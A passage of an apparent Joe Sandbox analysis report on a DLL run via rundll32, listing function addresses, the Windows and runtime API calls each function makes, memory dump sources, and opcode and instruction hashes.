                                                                                                                          • Opcode Fuzzy Hash: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                          • Instruction Fuzzy Hash: 9B312A38A00646EFCB14EFA4CE9595DBBB0FF08311B15466CE5569F2A2DB30FA81CB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10022C16 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CharNextA.USER32(?), ref: 10022C6D
                                                                                                                            • Part of subcall function 10033A93: __ismbcspace_l.LIBCMT ref: 10033A99
                                                                                                                          • CharNextA.USER32(00000000), ref: 10022C8A
                                                                                                                          • _strtol.LIBCMT ref: 10022CB5
                                                                                                                          • _strtoul.LIBCMT ref: 10022CBC
                                                                                                                            • Part of subcall function 100338D4: strtoxl.LIBCMT ref: 100338F4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4211061542-0
                                                                                                                          • Opcode ID: c0131c4ce0529d7fd5e33596a62ab6746ae30cca9c8134ef8296b597ce6c539f
                                                                                                                          • Instruction ID: 5151050668a075cb653ef24e642dff21439099837a3a94c33d4a4bfb9d6c905b
                                                                                                                          • Opcode Fuzzy Hash: c0131c4ce0529d7fd5e33596a62ab6746ae30cca9c8134ef8296b597ce6c539f
                                                                                                                          • Instruction Fuzzy Hash: 352127755002556FDB21DFB49C81BAEB7F8DF48241FA14066F984D7240DB709D40CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10027B2E Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ArrayDestroyFreeSafeTask
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3253174383-0
                                                                                                                          • Opcode ID: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                          • Instruction ID: 529fdc980b661751dfd2f1e67b0f163afa7902daf74f578c55dc250feead27ea
                                                                                                                          • Opcode Fuzzy Hash: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                          • Instruction Fuzzy Hash: 71117930201206EBDF66DF65EC88B6A7BE8FF05796B914458FC99CB250DB31ED01CA64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100266ED Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Rect$EqualH_prolog3Intersect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2161412305-0
                                                                                                                          • Opcode ID: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                          • Instruction ID: ff5c973b4bb1c2d03ca17daa0168de659ad61ff9b2eaf64daf92020a6b0172b0
                                                                                                                          • Opcode Fuzzy Hash: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                          • Instruction Fuzzy Hash: D621367590024AEFCB01DFA4DD849EEBBB8FF08240F50856AF915A7111DB34AA05DB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1001FCED Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 1001FCF4
                                                                                                                            • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 1001FD2A
                                                                                                                          • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004F158,00000004,10013BBC,8007000E), ref: 1001FD53
                                                                                                                            • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                          • LocalFree.KERNEL32(8007000E,8007000E), ref: 1001FD7C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1615547351-0
                                                                                                                          • Opcode ID: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                          • Instruction ID: 02293aacd12bdd5b71dc2e1620005b8d21a8bb506af1f41bdeabb16afe14deca
                                                                                                                          • Opcode Fuzzy Hash: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                          • Instruction Fuzzy Hash: C0118675504249FFDB05DFA4DC819BE3BA9FB08350F118929F915CE2A1E631DA50C754
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10017081 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindResourceA.KERNEL32 ref: 100170A7
                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 100170AF
                                                                                                                          • LockResource.KERNEL32(00000000), ref: 100170C1
                                                                                                                          • FreeResource.KERNEL32(00000000), ref: 1001710B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$FindFreeLoadLock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1078018258-0
                                                                                                                          • Opcode ID: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                          • Instruction ID: b090516e65dfb2cc0079b63036416f790ce173b21e3ea297a20d0f4a61f138d4
                                                                                                                          • Opcode Fuzzy Hash: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                          • Instruction Fuzzy Hash: 0A11DA34600B61FBC711DF68CD88AAAB3B4FB08295F118119E8468B550E3B0ED80D6A0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10015123 Relevance: 6.1, APIs: 4, Instructions: 56threadCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 1001512A
                                                                                                                            • Part of subcall function 10015D26: __EH_prolog3.LIBCMT ref: 10015D2D
                                                                                                                          • __strdup.LIBCMT ref: 1001514C
                                                                                                                          • GetCurrentThread.KERNEL32(00000004,10001031,00000000), ref: 10015179
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 10015182
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4206445780-0
                                                                                                                          • Opcode ID: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
                                                                                                                          • Instruction ID: 8b11c4afa576c4c19aa6f664ae71e644c3fa519ec3c9c99d11d7e99696a9cddb
                                                                                                                          • Opcode Fuzzy Hash: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
                                                                                                                          • Instruction Fuzzy Hash: C2218EB0801B40DFC722CF7A854525AFBF8FFA4601F14891FE59A8A721DBB4A481CF04
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10017709 Relevance: 6.1, APIs: 4, Instructions: 55registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10017742
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 1001774B
                                                                                                                          • _swprintf.LIBCMT ref: 10017768
                                                                                                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10017779
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4210924919-0
                                                                                                                          • Opcode ID: 3276be8801f00fc95fb59eac867b2e4799b3078c36edba842ee4648e314c5080
                                                                                                                          • Instruction ID: e9188d0bda7618ab121d067f9e2349c71729dbb6fdaec1ca83b1d39ed15240a7
                                                                                                                          • Opcode Fuzzy Hash: 3276be8801f00fc95fb59eac867b2e4799b3078c36edba842ee4648e314c5080
                                                                                                                          • Instruction Fuzzy Hash: A901C072500219FBEB00DF648D85FAFB3BCEF09704F010429FA05EB181EAB0E90187A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10017C4C Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindResourceA.KERNEL32 ref: 10017C70
                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 10017C7C
                                                                                                                          • LockResource.KERNEL32(00000000), ref: 10017C8A
                                                                                                                          • FreeResource.KERNEL32(00000000), ref: 10017CB8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$FindFreeLoadLock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1078018258-0
                                                                                                                          • Opcode ID: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                          • Instruction ID: 37c567c5ed2abd0c262b3d9c14b2c0b98263367eb1ad4cff580600f06ae044bd
                                                                                                                          • Opcode Fuzzy Hash: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                          • Instruction Fuzzy Hash: 44112875600219EFDB409F95CA88AAE7BB9FF09390F108069F9099B260DB71DD40CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1002665D Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3354205298-0
                                                                                                                          • Opcode ID: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
                                                                                                                          • Instruction ID: 41f5bb3622a22b3bbc1aebe7228573581b0e45adc76bddbe530eb5e3d74ee13d
                                                                                                                          • Opcode Fuzzy Hash: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
                                                                                                                          • Instruction Fuzzy Hash: C6111C7690021AEFDF01DF94CC89EDE7BB9FF09245F004061FA04DA011E7719645CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10021616 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10021648
                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 1002164E
                                                                                                                          • DuplicateHandle.KERNEL32 ref: 10021651
                                                                                                                          • GetLastError.KERNEL32(?), ref: 1002166C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3704204646-0
                                                                                                                          • Opcode ID: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                          • Instruction ID: b1d6e851d134fb09cc2650d0be1f9f41ce2f018d7dad051a3fdc0e20acdc4583
                                                                                                                          • Opcode Fuzzy Hash: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                          • Instruction Fuzzy Hash: 43018479700204BFEB10DBA5DD89F5E7BACEF88750F544055F904CB291EA71EC008B60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100155B8 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • EnableMenuItem.USER32 ref: 100155F0
                                                                                                                            • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                          • GetFocus.USER32 ref: 10015607
                                                                                                                          • GetParent.USER32(?), ref: 10015615
                                                                                                                          • SendMessageA.USER32 ref: 10015628
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: EnableException@8FocusItemMenuMessageParentSendThrow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4211600527-0
                                                                                                                          • Opcode ID: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                          • Instruction ID: 5e122fa76a0b730552ea88f4d91bd13ac6dffab2f223f6deda68fe1d030935d6
                                                                                                                          • Opcode Fuzzy Hash: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                          • Instruction Fuzzy Hash: 6D118E71100611EFDB20DF60CD8581AB7F6FF88716B54C62DF1568A560D732EC848B91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1001B96E Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetTopWindow.USER32(00000000), ref: 1001B97C
                                                                                                                          • GetTopWindow.USER32(00000000), ref: 1001B9BB
                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 1001B9D9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2353593579-0
                                                                                                                          • Opcode ID: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                          • Instruction ID: d676a82d7887273777baca2e38fe8b62e8198389fbfbdcd46b7f1d18b22838b9
                                                                                                                          • Opcode Fuzzy Hash: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                          • Instruction Fuzzy Hash: 92012236001A2ABBCF129F919D05EDE3B6AEF49394F004010FE0069120D736C9A2EBA6
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1001B32D Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 1001B338
                                                                                                                          • GetTopWindow.USER32(00000000), ref: 1001B34B
                                                                                                                            • Part of subcall function 1001B32D: GetWindow.USER32(00000000,00000002), ref: 1001B392
                                                                                                                          • GetTopWindow.USER32(?), ref: 1001B37B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Item
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 369458955-0
                                                                                                                          • Opcode ID: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                          • Instruction ID: 858530c175d9441ab3e78fa875986bdb84c423c322646567b0054cf47e6755e0
                                                                                                                          • Opcode Fuzzy Hash: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                          • Instruction Fuzzy Hash: 4D01A236101E6AF7DB129F618D05E8F3B99EF453E4F024010FD249D120DB71DBB196A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1003C9F5 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3016257755-0
                                                                                                                          • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                          • Instruction ID: 43f41ac90f78858b98c9d7795bb0f5538c3c8e7231dcd18d5b884ccf0efad8a7
                                                                                                                          • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                          • Instruction Fuzzy Hash: 78013D3640054EBFCF139F86DC41CEE3F66FB19295F558415FA1898121C636DAB1AB82
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1002BC31 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SysStringLen.OLEAUT32(?), ref: 1002BC45
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC5D
